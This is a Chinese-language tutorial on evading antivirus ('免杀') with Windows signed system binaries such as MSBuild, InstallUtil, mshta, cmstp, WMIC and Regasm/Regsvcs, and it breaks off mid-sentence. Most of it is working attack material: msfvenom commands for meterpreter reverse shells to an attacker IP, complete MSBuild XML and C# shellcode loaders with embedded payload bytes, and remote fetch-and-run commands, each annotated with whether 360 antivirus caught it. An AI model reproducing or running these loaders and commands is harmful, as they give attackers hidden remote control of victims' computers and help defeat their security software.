远控免杀——白名单篇

前言

白名单程序，白就是此文件在杀软的白名单中，不会被杀软查杀

黑就是恶意代码

通过白+黑的方式组成木马等，来达到免杀的目的

白名单程序的利用起源于LOLBins，全称Living off the land Binaries。Lolbins为二进制文件，攻击方可以通过该二进制文件执行超出其本身功能的工作

LOLBins定义

1. 它是操作系统本身文件，或者是从Microsoft下载的文件。总之它必须带有windows自身签名文件。

2. 由于是windows自身签名文件，所以一般天然带有免杀的属性,能通过很多应用程序的白名单。

3. 它具有APT功能或者一些对红队有用的功能。比如2019年TA505利用LoLbin和新型后门攻击金融行业。

LOLBins功能

1. 执行代码：任意代码执行，通过LOLbins执行其他程序（未带微软签名）或者脚本。

2. 代码编译

3. 文件操作。下载；上传；复制

4. 持久性权限维持。利用现有的LOLBins来做权限维持；持久性（比如通过隐藏数据在AD中，在登录时候启动。）

5. UAC Bypass

6. 转储进程内存

7. 监控（例如键盘记录器，网络跟踪等等）

8. 逃避/修改日志

9. 不需要重定位到文件系统其他位置的DLLinjected/side-loading。

MSBuild.exe

在工具篇中用到的nps_payload就是生成.xml，然后利用msbuild.exe来加载payload

适用条件：.NET Framework>=4.0

加载文件方式

1. 本地加载执行

   %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml

2. 远程文件执行

   wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml

利用一

msfvenom生成powershell shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 lport=4444 -f psh -o shell.ps1

在ps1脚本末尾添加for (;;){\n Start-sleep 60\n}

用base64编码后放入shell.xml中cmd处

<Project ToolsVersion="4.0"
xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 <!-- This inline task executes c# code. -->
 <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
nps.xml -->
 <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->
 <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->
 <!-- License: BSD 3-Clause -->
 <Target Name="npscsharp">
 <nps />
 </Target>
 <UsingTask
 TaskName="nps"
 TaskFactory="CodeTaskFactory"
 
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microso
ft.Build.Tasks.v4.0.dll" >
 <Task>
 <Reference Include="System.Management.Automation" />
 <Code Type="Class" Language="cs">
 <![CDATA[
 using System;
 using System.Collections.ObjectModel;
 using System.Management.Automation;
 using System.Management.Automation.Runspaces;
 using Microsoft.Build.Framework;
 using Microsoft.Build.Utilities;
 public class nps : Task, ITask
 {
 public override bool Execute()
 {
 string cmd = "JEFuRUl---base64_shellcode-----
xsSW1wb3J0KCJrZXJuZWwzMi5k";
 PowerShell ps = PowerShell.Create();
 ps.AddScript(Base64Decode(cmd));
 Collection<PSObject> output = null;
 try
 {
 output = ps.Invoke();
 }
 catch(Exception e)
 {
 Console.WriteLine("Error while executing the
script.\r\n" + e.Message.ToString());
 }
 if (output != null)
 {
 foreach (PSObject rtnItem in output)
 {
 Console.WriteLine(rtnItem.ToString());
 }
 }
 return true;
 }
 public static string Base64Encode(string text) {
 return
System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(te
xt));
 }
 public static string Base64Decode(string encodedtext) {
 return
System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String
(encodedtext));
 }
 }
 ]]>
 </Code>
 </Task>
 </UsingTask>
</Project>

脚本执行有点问题，shell.xml能过360静态查杀

利用二

msfvenom生成C# shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 lport=4444 -f csharp

shellcode.xml

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee --> 
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
    
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class ClassExample :  Task, ITask
        {         
          private static UInt32 MEM_COMMIT = 0x1000;          
          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
          [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
          [DllImport("kernel32")]
            private static extern IntPtr CreateThread(            
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId           
            );
          [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(           
            IntPtr hHandle,
            UInt32 dwMilliseconds
            );          
          public override bool Execute()
          {
            byte[] shellcode = new byte[354] {
0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x31,0xff,0x0f,0xb7,0x4a,0x26,
0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
0x75,0xef,0x52,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,
0xc0,0x57,0x74,0x4c,0x01,0xd0,0x8b,0x58,0x20,0x01,0xd3,0x8b,0x48,0x18,0x50,
0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xc1,
0xcf,0x0d,0xac,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,
0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,
0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0xdd,0x80,0x68,0x02,
0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,
0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,
0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,
0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };
              
              UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
              IntPtr hThread = IntPtr.Zero;
              UInt32 threadId = 0;
              IntPtr pinfo = IntPtr.Zero;
              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
              WaitForSingleObject(hThread, 0xFFFFFFFF);
              return true;
          } 
        }     
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

msf上线

360动静态未查杀

misexec.exe

当Windows操作系统安装了Windows Installer引擎，⽽MSI软件包使⽤该引擎来 安装应⽤程序，解释包和安装产品的可执⾏程序

使用方式

msiexec /q /i http://ip/shell.msi

经测试msf自生成以及一些工具生成的msi文件免杀效果都一般

InstallUtil.exe

InstallUtil.exe可以⽤于安装由.NET开发的所有应⽤安装程序

CSC+InstallUtil执行shellcode

msfvenom生成C# shellcode 编码一下

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.221.128 lport=4444 -f csharp

InstallUtil-Shellcode.cs （Shellcode替换下）

using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /unsafe /platform:x86 /out:exeshell.exe Shellcode.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
(Or)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
	The gist of this one is we can exhibit one behaviour if the application is launched via normal method, Main().
	Yet, when the Assembly is launched via InstallUtil.exe, it is loaded via Reflection and circumvents many whitelist controls.
	We believe the root issue here is:
	
	The root issue here with Assembly.Load() is that at the point at which execute operations are detected 
	(CreateFileMapping->NtCreateSection), only read-only access to the section is requested, so it is not processed as an execute operation.  
	Later, execute access is requested in the file mapping (MapViewOfFile->NtMapViewOfSection), 
	which results in the image being mapped as EXECUTE_WRITECOPY and subsequently allows unchecked execute access.
	
	The concern is this technique can circumvent many security products, so I wanted to make you aware and get any feedback.
	Its not really an exploit, but just a creative way to launch an exe/assembly.
*/
 
//root@infosec:~# msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp > pentestShellCode.txt

	public class Program
	{
		public static void Main()
		{
			Console.WriteLine("Hello From Main...I Don't Do Anything");
			//Add any behaviour here to throw off sandbox execution/analysts :)
			
		}
		
	}
	
	[System.ComponentModel.RunInstaller(true)]
	public class Sample : System.Configuration.Install.Installer
	{
	    //The Methods can be Uninstall/Install.  Install is transactional, and really unnecessary.
	    public override void Uninstall(System.Collections.IDictionary savedState)
	    {
		
		Shellcode.Exec();
	    	
	    }
	    
	}
	
	public class Shellcode
	{
			public static void Exec()
			{
				// native function's compiled code
				// generated with metasploit
                byte[] shellcode = new byte[516] {
0xbb,0xb5,0x9f,0x2d,0x3f,0xda,0xd6,0xd9,0x74,0x24,0xf4,0x5d,0x33,0xc9,0xb1,
0x7b,0x31,0x5d,0x13,0x03,0x5d,0x13,0x83,0xc5,0xb1,0x7d,0xd8,0xe2,0x78,0x3b,
0xf6,0x54,0x9d,0x5a,0x20,0x12,0x45,0x57,0x8d,0xf2,0x4c,0x26,0x46,0x34,0x19,
0x50,0x24,0xf1,0xa1,0x61,0x7d,0xeb,0x9e,0xd9,0xdd,0xdb,0x71,0x74,0x3a,0x15,
0x7d,0x07,0x5c,0x7e,0x27,0x3e,0x0e,0xa3,0xc4,0x73,0x6e,0xdf,0xac,0xbc,0x59,
0x24,0x5b,0xd6,0x27,0x73,0xab,0x68,0xfd,0x45,0xb3,0xb2,0xe3,0x87,0xde,0x08,
0x05,0xdc,0xbe,0xf5,0x0c,0xc0,0xca,0xe5,0x52,0x1a,0x9f,0x5b,0xb9,0x95,0x73,
0x06,0x8e,0x47,0x44,0xd4,0x2d,0xd1,0xaa,0x34,0x61,0x83,0xc1,0xec,0xd4,0xde,
0x96,0x42,0xed,0x83,0xc5,0xe0,0xf1,0x9d,0xf3,0x4f,0x38,0x7a,0x18,0xda,0x97,
0x81,0x1b,0xf8,0xdf,0xf0,0x2d,0x5f,0x22,0xaa,0x35,0x2c,0x04,0xda,0xe5,0x33,
0x0e,0x3e,0x23,0x8c,0x74,0xbd,0x09,0xc5,0xe4,0x9a,0x59,0x85,0x62,0x39,0x46,
0x4c,0x92,0x74,0xa1,0x75,0x3e,0x67,0xa6,0xe5,0xf6,0x66,0x4f,0x4d,0x61,0xa2,
0xd8,0x27,0xca,0xd6,0x08,0x5b,0x68,0x91,0x98,0x33,0xb8,0xfa,0x8d,0xd8,0x0d,
0xf9,0xef,0x50,0xca,0xf1,0xae,0x5a,0x82,0xba,0xec,0xca,0x17,0xb2,0x5e,0x01,
0xa6,0x8a,0x53,0xda,0x2a,0x4a,0x53,0x80,0xf5,0x2d,0x86,0x7c,0x02,0x71,0xa9,
0x7d,0x91,0x6e,0x75,0xc7,0x2a,0x48,0xfd,0x03,0xe8,0x96,0x51,0x0b,0xfc,0x94,
0xf7,0xab,0x6a,0x8f,0x23,0xc2,0xf5,0xc6,0xaf,0x1b,0x5d,0x82,0x94,0x51,0x44,
0xa8,0xa8,0xea,0x72,0xd1,0xea,0xd2,0xde,0xb6,0x35,0x6b,0xdf,0xa9,0xeb,0x65,
0x67,0xdf,0x64,0xf4,0xb2,0xeb,0xd4,0x32,0x65,0xe3,0x37,0x16,0xf8,0x8d,0x66,
0x9f,0xdf,0x59,0xa8,0xce,0xbb,0x19,0x5b,0x55,0x8a,0xa0,0xb4,0xc5,0x4c,0x77,
0xd9,0xca,0xf3,0x52,0x8a,0x9b,0x82,0x7b,0x19,0xf4,0x22,0xe8,0x04,0xba,0x8e,
0xdb,0xfb,0x21,0xcf,0x2d,0x1c,0xb9,0xed,0xff,0x83,0x76,0xa7,0x12,0x77,0xec,
0xbb,0x76,0x75,0xe9,0xec,0xd7,0xe1,0x68,0x2a,0x72,0x69,0xbb,0x6d,0xde,0x6f,
0xbf,0x9c,0x49,0x43,0xef,0x7e,0xf7,0xfd,0x42,0x55,0x40,0xa1,0x3e,0xa9,0x81,
0xce,0xf8,0xa3,0x21,0x35,0x85,0x4a,0x18,0x86,0xd0,0xa3,0x89,0x28,0x53,0xeb,
0xa0,0x54,0x79,0x54,0x6b,0xd8,0xd1,0xff,0xe8,0x09,0x70,0xb2,0x9e,0x4e,0xd3,
0x53,0x41,0xf3,0x90,0xd3,0x71,0xcb,0x70,0xa7,0x68,0x9c,0xd5,0x29,0xcb,0xcd,
0x7f,0xc3,0xd1,0xd3,0x98,0x3b,0xa6,0x16,0x3b,0xc9,0x08,0xdd,0x19,0x48,0xf7,
0xb8,0x2a,0x75,0x2a,0x9c,0x71,0x28,0x2d,0x53,0xfa,0xc3,0x55,0xa6,0x9b,0x22,
0xe1,0xd4,0x06,0xbd,0x44,0xfc,0x39,0x01,0xf0,0x09,0x09,0xbf,0xe0,0x60,0xa7,
0x2e,0xc1,0xf9,0x78,0x1f,0xfc,0xb2,0x3a,0xc5,0xe3,0x96,0xc1,0xf3,0x21,0x4c,
0xb0,0xb0,0x64,0x24,0x6e,0x42,0x94,0x9e,0x0b,0x67,0xb1,0x2d,0x7c,0x44,0xea,
0x0b,0x6a,0xad,0x35,0x67,0x23,0x12,0xcd,0xd8,0x5b,0x12,0xc5,0xf1,0xc7,0x15,
0x51,0x14,0x85,0x32,0xe7,0x96,0xc6,0x92,0xb4,0x5e,0x60,0x8d,0x5d,0x7b,0x6f,
0xb5,0x80,0x9e,0x9b,0x75,0x11 };


	 
				UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length,
									MEM_COMMIT, PAGE_EXECUTE_READWRITE);
				Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
				IntPtr hThread = IntPtr.Zero;
				UInt32 threadId = 0;
				// prepare data
	 
	 
				IntPtr pinfo = IntPtr.Zero;
	 
				// execute native code
	 
				hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
				WaitForSingleObject(hThread, 0xFFFFFFFF);
	 
		  }
	 
			private static UInt32 MEM_COMMIT = 0x1000;
	 
			private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
	
			[DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
             UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
 
        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress,
                              UInt32 dwSize, UInt32 dwFreeType);
 
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
 
          UInt32 lpThreadAttributes,
          UInt32 dwStackSize,
          UInt32 lpStartAddress,
          IntPtr param,
          UInt32 dwCreationFlags,
          ref UInt32 lpThreadId
 
          );
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
 
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
 
          IntPtr hHandle,
          UInt32 dwMilliseconds
          );
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(
 
          string moduleName
 
          );
        [DllImport("kernel32")]
        private static extern UInt32 GetProcAddress(
 
          IntPtr hModule,
          string procName
 
          );
        [DllImport("kernel32")]
        private static extern UInt32 LoadLibrary(
 
          string lpFileName
 
          );
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();
			
	 
		}

CSC.exe编译InstallUtil-Shellcode.cs

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\test\shell.exe C:\test\InstallUtil-ShellCode.cs

用InstallUtil.exe执行shell.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\test\shell.exe

执行后360安全卫士有行为检测预警，允许则msf可上线

360杀毒静态可查杀

Mshta.exe

用于执行.hta文件，但是在工具篇中hta的免杀效果比较一般

msf直接生成的hta用Mshta.exe还是会被查杀

CACTUSTORCH

在CACTUSTORCH.hta的binary处，选择要注入的exe

生成32位shellcode

msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f raw -o payload.bin

base64编码

cat payload.bin | base64 -w 0

把编码后的code复制到CACTUSTORCH.hta的code处

Kali起一个服务，Win7执行

mshta.exe http://192.168.221.128/CACTUSTORCH.hta

360没有反应但是一直msf一直没上线，注入程序calc、rundll32都试过

拖到本地执行直接报毒了，Mshta.exe没有一个免杀成功的醉了

Rundll32.exe

可执行32位的DLL文件，以命令行的方式调用动态链接库

Rundll32.exe DLLname,Functionname

Rundll32.exe加载payload的免杀效果依赖于payload所做的免杀，且免杀效果一般通过行为检测来判断

MSFVenom和msf中SMB DElivery模块都可以生成恶意dll文件，但是执行都过不了行为检测

Regsvr32.exe

Regsvr32是⼀个命令⾏实⽤程序，⽤于注册和取消注册OLE控件，例如Windows注册表中的DLL和ActiveX控件，以命令⾏⽅式运⾏

加载payload的原理就是通过JScript代码执行不同的命令，测试下来都过不了行为检测

Cmstp.exe

⽤于安装连接管理器服务配置⽂件的命令⾏程序。CMSTP.exe接受安装信息⽂件（INF）作为参数，并安装⽤于远程访问连接的服务配置⽂件。

执行本地dll文件

msfvenom生成DLL文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f dll -o test.dll

cmstp.inf

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\test\test.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Jasontt"
ShortSvcName="Jasontt"

行为检测预警，dll文件直接被360杀毒删除

执行cmd命令

cmstp.inf

[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
c:\windows\system32\calc.exe
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Jasontt"
ShortSvcName="Jasontt"

就是把RegisterOCXSection换成RunPreSetupCommandsSection，直接执行cmd命令

行为检测预警为cmstp攻击

下载并解析远程inf文件

行为检测同样过不了。。。

FTP.exe

提供基本的FTP访问

echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt

不会触发行为监测，但是请求的可执行程序没有做好免杀还是会被360查杀

WMIC

WMIC扩展WMI（Windows Management Instrumentation，Windows管理工具） ，提供了从命令行接口和批命令脚本执行系统管理的支持

这个应该挺眼熟的，看过某些攻防类书籍一般会有这个

远程加载payload

生成一个hta文件

payload.xsl

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemasmicrosoft-com:xslt"
xmlns:user="placeholder"
version="1.0"> <output method="text"/>
<ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 var r = new
ActiveXObject("WScript.Shell").Run("http://192.168.221.128:8088/TyPHLB3I.hta");
 ]]> </ms:script>
</stylesheet>

执行后360预警wmic恶意命令执行攻击

Regasm.exe/Regsvcs.exe

依赖环境：Microsoft.NET Framework v4.0.30319、Microsoft SDKs

Regsvcs和Regasm是Windows命令⾏实⽤程序，⽤于注册.NET组件对象模型(COM)程序集

生成C# shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f csharp

regsvcs.cs

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll 
[OR]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
//Executes UnRegisterClass If you don't have permissions
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
//This calls the UnregisterClass Method
*/
namespace regsvcser
{
    
    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }
		
		[ComRegisterFunction] //This executes if registration is successful
		public static void RegisterClass ( string key )
		{
			Console.WriteLine("I shouldn't really execute");
			Shellcode.Exec();
		}
		
		[ComUnregisterFunction] //This executes if registration fails
		public static void UnRegisterClass ( string key )
		{
			Console.WriteLine("I shouldn't really execute either.");
			Shellcode.Exec();
		}
    }
	
	public class Shellcode
    {
        public static void Exec()
        {
            // native function's compiled code
            // generated with metasploit
            // executes calc.exe
            byte[] shellcode = new byte[354] {
0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x64,0x8b,0x52,0x30,0x89,0xe5,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x31,0xff,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,
0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,
0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x58,0x20,0x50,0x8b,0x48,0x18,0x01,0xd3,
0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xac,
0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,
0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,
0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0xdd,0x80,0x68,0x02,
0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,
0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,
0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,
0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 };




            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            // prepare data


            IntPtr pinfo = IntPtr.Zero;

            // execute native code

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }

        private static UInt32 MEM_COMMIT = 0x1000;

        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
             UInt32 size, UInt32 flAllocationType, UInt32 flProtect);


        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(

          UInt32 lpThreadAttributes,
          UInt32 dwStackSize,
          UInt32 lpStartAddress,
          IntPtr param,
          UInt32 dwCreationFlags,
          ref UInt32 lpThreadId

          );

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(

          IntPtr hHandle,
          UInt32 dwMilliseconds
          );


    }

}

用csc.exe将cs文件生成为dll文件

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:1.dll /keyfile:key.snk regsvcs.cs

msf配置好监听，Regasm.exe/Regsvcs.exe执行恶意dll文件即可

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe 1.dll
或
